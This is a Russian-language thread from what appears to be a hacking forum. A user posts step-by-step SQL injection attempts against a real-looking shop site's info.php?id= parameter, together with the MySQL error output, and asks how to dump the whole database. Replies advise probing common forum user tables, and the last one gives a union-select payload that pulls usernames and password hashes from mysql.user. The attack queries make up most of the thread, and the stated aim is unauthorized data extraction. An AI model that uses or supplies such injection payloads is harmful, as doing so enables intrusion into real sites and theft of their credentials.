• XSS.stack #1 – первый литературный журнал от юзеров форума

sql

Отслеживать

p00za

floppy-диск
Пользователь
Регистрация
10.10.2006
Сообщения
4
Реакции
0
Здравствуйте. Думаю хоть тут мне помогут просто разобраться.
нашел sql-inj
www.sss.com/info.php?id=2244 - нормальный
www.sss.com/info.php?id=2242+2 -проверка на sql


1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2 AND ptf.products_extra_fields_id='8'' at line 1

SELECT pef.products_extra_fields_name as name, ptf.products_extra_fields_value as value FROM products_extra_fields pef LEFT JOIN products_to_products_extra_fields ptf ON ptf.products_extra_fields_id=pef.products_extra_fields_id WHERE ptf.products_id=2242 2 AND ptf.products_extra_fields_id='8'


начинаю подбирать столбцы :


www.sss.com/info.php?id=2244 union select 1/*
вижу:


1222 - The used SELECT statements have a different number of columns

SELECT pef.products_extra_fields_name as name, ptf.products_extra_fields_value as value FROM products_extra_fields pef LEFT JOIN products_to_products_extra_fields ptf ON ptf.products_extra_fields_id=pef.products_extra_fields_id WHERE ptf.products_id=2244 union select 1/* AND ptf.products_extra_fields_id='8'


делаю такой запрос:


www.sss.com/info.php?id=2244 union select 1,1/*

и вижу истинное значение без ошибки.

начинаю брутить таблицы :


www.sss.com/info.php?id=2244 union select 1,1 from passwd/*
www.sss.com/info.php?id=2244 union select 1,1 from id/* и тд.


1146 - Table 'bluestri_bluestripephoto.passwd' doesn't exist

SELECT pef.products_extra_fields_name as name, ptf.products_extra_fields_value as value FROM products_extra_fields pef LEFT JOIN products_to_products_extra_fields ptf ON ptf.products_extra_fields_id=pef.products_extra_fields_id WHERE ptf.products_id=2244 union select 1,1 from passwd/* AND ptf.products_extra_fields_id='8'
и тд.


как можно вытащить как можно больше инфы из БД?
Как устанавливать имена таблиц? или имя таблицы из которой происходит первоначальная выборка данных?
Помогите с путе-водителем (=
всё таки как угдать БД в этом случие.
 
если есть форум, можно попробовать стандартные таблицы типа phpbb_users, ibf_members, ...
Добавлено в [time]1160478686[/time]
Помогите с путе-водителем (=
всё таки как угдать БД в этом случие.
знание русского языка хотя бы на уровне 9 класса было бы кстати...
 
Great спасибо за комплемент.!
ты очень внимательный. (учту)
вопросик:
ww.sss.com/info.php?id=2244 union select 1,1/*

и вижу истинное значение без ошибки.
это значит , что я подобрал столбцы.
тогда i даю такой запрос:
ww.sss.com/info.php?id=2244 union select 1,VERSION(),1/*
1222 - The used SELECT statements have a different number of columns

SELECT pef.products_extra_fields_name as name, ptf.products_extra_fields_value as value FROM products_extra_fields pef LEFT JOIN products_to_products_extra_fields ptf ON ptf.products_extra_fields_id=pef.products_extra_fields_id WHERE ptf.products_id=2244 union select 1,VERSION(),1/* AND ptf.products_extra_fields_id='8'

как это понимать? "Используемые утверждения ВЫБОРА имеют различное число колонок"
я же подобрал.


еще: как узнать начальное имя таблицы(из которой происходит первоначальная выборка данных)
то есть получается , что если мне надо всю БД
то я должен брутить все таблицы и выбирать из них данные.
по другому не как?
 
www.sss.com/info.php?id=2244%20union%20select%201,USER()/*

ошибке не вижу. та же страница , что и www.sss.com/info.php?id=2244 ток с деформацией
например форма:
<--SDL-->
lot $0.00
lot $0.00
lot $0.00
lot $0.00
lot $0.00
..... и т.д. и не чего больше (ошибки нет)
и как мне понять на правильном пути я или нет? (чтоб начать брутить таблицы )
www.sss.com/info.php?id=2244%20union%20select%201,20%form%20passwd/*

ошибка: 1054 - Unknown column 'form' in 'field list'
ето значит что запрос верный и просто не правильная таблица указана. так? или кол-ва колонок не хватет для этого запроса ?


посоветуйте , что делать чтоб снять БД.

p.s:редактирую сообщения т.к тут не поддерживают быструю переписку ;)
 
есть пара вопросов и всё:
1)как узнать начальное имя таблицы(из которой происходит первоначальная выборка данных)
2)как мне составить запрос , чтоб не сомневаться в его правильности
(например: ww.sss.com/info.php?id=2244 union select 1,1/* -кол-во подобрал
брутить надо так ww.sss.com/info.php?id=2244 union select from имя_таблицы/* или ww.sss.com/info.php?id=2244 union select 1,2 from имя_таблицы/* )
3) посоветуйте , что сделать или за что зацепится чтоб снять БД.

Добавлено в [time]1160483585[/time]
p00za - лол :cry2:
 
1)как узнать начальное имя таблицы(из которой происходит первоначальная выборка данных)
SELECT pef.products_extra_fields_name as name, ptf.products_extra_fields_value as value FROM products_extra_fields pef LEFT JOIN products_to_products_extra_fields ptf ON ptf.products_extra_fields_id=pef.products_extra_fields_id WHERE ptf.products_id=2244 union select 1,VERSION(),1/* AND ptf.products_extra_fields_id='8'

=\

2)как мне составить запрос , чтоб не сомневаться в его правильности

почитать доки по sql =\

за что зацепится чтоб снять БД.

головой за стену =\
 
Попробуй вытащить инфу из главной таблицы юзеров MySQL.

ww.sss.com/info.php?id=2244+union+select+user,password+from+mysql.user/*
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх